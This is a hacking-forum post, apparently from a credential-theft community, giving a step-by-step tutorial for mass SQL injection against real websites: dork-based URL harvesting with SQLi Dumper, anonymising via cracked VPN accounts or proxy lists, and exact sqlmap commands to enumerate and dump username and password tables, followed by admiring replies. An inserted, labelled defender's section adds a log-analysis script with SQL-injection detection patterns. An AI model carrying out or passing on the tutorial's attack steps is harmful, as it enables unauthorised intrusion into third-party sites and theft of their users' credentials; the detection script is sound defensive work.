ForlaxPy

New DB Dumping Method Tutorial (Private & Fast) [with Pictures]


Preface:

I have been into DB hacking for quite a while now and always struggled finding new and private databases to get good hits from. I spoke with some very HQ members of this community which were able to expand my knowledge a lot. I planned on selling this as an E-Book but after all everyone should have access to private databases as long as they are part of this community.

!You might think this tutorial seems familiar at the beginning but the interesting part comes at the end so don't click away!

Okay now enough of this BS and let's get started!

[hide]

1. Python 2.7 + click +

2. SQLmap + click +

3. SQLiDumper + click +

 

[align=center]4. VPN Accounts (Check Accounts Section) (Hide My Ass works best)

5*. RDP / VPS

* not needed but helpful

 

__________________________________________________________________________________________

 

Let's get started:

 

 

 

1. Create a new Folder called "DB Hacking" or something along these lines. (Why? -> Else you might lose the overview)

 

 

 

2. Download and install Python 2.7.XXX.

 

Remember to add Python to your system path (Should look like this)

 


 

 

3. Download SQLiDumper 8.3 and add it into your folder.

 

 

 

Folder: DB Hacking

∟ SQLi Dumper 8.3

 

 

 

 

3. Download the newest sqlmap version and also add it into your folder.

 

 

Folder: DB Hacking

∟ SQLi Dumper 8.3

∟ sqlmapproject-xx

 

 

 

 

3. Go get yourself some dorks.

 

You don't know how?

+ click +

Or just use mine (These won't give you private DBs as other ppl can use them too)

 


 

 

 

 

 

4. Open SQLi Dumper 8.3 and paste your Dorks

 


 

(You can now choose between using HMA 2.8.24.0 or proxies)

 

How to use HMA:

 

 

1. Buy / Crack a premium Acc.

2. Download HMA 2.8.24.0

3. Put in your login details and connect for the first time

 


 

 

Then reconnect your VPN and click Start Scanner > URLS only in SQLi Dumper

 

 

 

 

How to use Proxies:

 

Go to www.socks24.org and download the newest proxy-list.

In SQLiDumper go to Tools & Settings -> Proxy

And paste all your downloaded proxies into the SOCKS5 4 column and Test them

 


It will take about 20 mins to check them all.

 

...wait until all are checked...

 

Click ok.

 

Now from the Dropdown choose SOCKS5 4 Protocol.

 

 

5. Start Checking the dorks.

 

This process will take a while and that's why I recommend using an RDP / VPS but you can do it on your main PC too.

 

After a few hrs you should have around 20k URLs and now can start checking them by canceling the Online Scanner.

 

So switch to the exploitables tab and click < Start Scanner >

 

Wait for them to be checked completely.

 

Now go to the next Tab "Injectables" and start this as well.

 

You will notice that most of the URLs are Non-Injectable (But these are what we are here for).

 

 

6. "Injecting the Non-Injectables" <- lmao sounds like a movie

 

Go to the Non-Injectables Tab and CTRL+A > Right click > Clipboard

 

Go into your sqlmap folder and create a urls.txt

 

Folder: DB Hacking

∟ SQLi Dumper 8.3

 sqlmapproject-xx

∟ urls.txt

 

Paste all your Non-Injectables in there.

 

Now Shift + Right Mouse

> Open cmd/powershell here

 

Now for the important command:

sqlmap.py -m "urls.txt" --random-agent -f --batch -o --tables --output-dir=OUTPUT

 

 

This command will now use the newest injections available and print out all the databases which are injectable.

You can always check which sites have already been tested by taking a look into the "OUTPUT" folder

There will be a lot of folders in the OUTPUT directory.

As some are still Non-Injectable I wrote a script to only keep the ones that are:

 

Download

 

https://www.file-upload.net/download-13433178/Cleaner.py.html

 

Run the file and you will be left with all folders containing a vulnerable Database. Now go back into the sqlmap folder and

open the cmd/powershell again.

Choose a folder from your output dir and open the target.txt

 

Copy the URL in there.

 

Now in your cmd type:

sqlmap.py -u "yoururl" --batch --dbs --output-dir=OUTPUT

This will give you a list of the DBs:

Now choose a DB which sounds like it would include the user:pass and type:

sqlmap.py -u "yoururl" --batch -D "Database Name" --tables --output-dir=OUTPUT

Now you have all tables; look for one like "users/ registration/ login..." and type:

sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" --columns --output-dir=OUTPUT

If you found the information you are looking for type:

sqlmap.py -u "yoururl" --batch -D "Database Name" -T "Tablename" -C "Columns (example: username, pass)" --dump --eta --threads=5 --output-dir=OUTPUT

 

 

This will now dump the columns and give you an ETA of when they are done. Sometimes the passwords are encrypted and need to be dehashed which sqlmap does automatically. It's really fast and easy. So have fun getting your private databases and show me some hits u got below.[/align]

 

Don't forget to leave a Like if you found this helpful!

[/hide]
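
For defenders, an added example that is not part of the original post: the post's sqlmap command uses --random-agent, so the User-Agent string is not a reliable signal, and the sketch below instead matches decoded query-string values in web server access logs and groups hits per client, path and parameter. The patterns, function names, paths and sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')

# Assumed starter patterns for decoded parameter values seen during injection
# probing and schema enumeration; tune them to your own applications.
PROBE_RE = re.compile(
    r"union\s+(?:all\s+)?select|information_schema|sleep\s*\(|benchmark\s*\("
    r"|\b(?:and|or)\s+\d+\s*=\s*\d+|order\s+by\s+\d+|'\s*(?:and|or)\s",
    re.IGNORECASE)

def probe_hits(lines):
    """Count probe-like requests per (client_ip, path, parameter)."""
    hits = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, target, _status = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes values and turns '+' into a space
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if PROBE_RE.search(value):
                hits[(ip, parts.path, name)] += 1
    return dict(hits)

def suspects(lines, threshold=3):
    """Triples with at least `threshold` probe requests, sorted."""
    return sorted(k for k, n in probe_hits(lines).items() if n >= threshold)

def _line(ip, target):
    # Helper that builds one constructed Combined Log Format line.
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" '
            '200 512 "-" "Mozilla/5.0"')

# Constructed sample traffic (documentation address ranges, hypothetical paths).
SAMPLE = [
    _line("198.51.100.23", "/item.php?id=7"),
    _line("203.0.113.9", "/item.php?id=7%20AND%201%3D1"),
    _line("203.0.113.9", "/item.php?id=7%20ORDER%20BY%203"),
    _line("203.0.113.9", "/item.php?id=7%20UNION%20ALL%20SELECT%20NULL%2CNULL"),
    _line("198.51.100.23", "/search.php?q=order+by+price"),
    _line("192.0.2.50", "/item.php?id=2%20AND%202%3D2"),
]

if __name__ == "__main__":
    print(suspects(SAMPLE))
```

Log matching only surfaces the probing; the fix on the application side is to bind request parameters in parameterized queries so their values never reach the SQL parser as code.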


"I spoke with some very HQ members of this community" think I was one of em

wasn't I


Well done, it is nice to have fresh method on how to dump some new databases. Appreciate :)


i would love to try it out and like you <3


thank you bro


i would love to try it out and like you


Nice Tutorial ! I like it :pepo:


omg i was searching for this for a long time , thanks a lot boss


Thanks, thank you very much, much appreciated.


thanks ima try


thanks fost this ia


LIKED!


thank you so much for sharing this! <3


will give this a try


I'm interested, let's see this


Linux or Windows needed?


thanks needed this


Fucking legend <3


Thanks a lot man for sharing


Thanks For This Great Share


I spoke with some very HQ members of this coI spoke with some very HQ members of this co
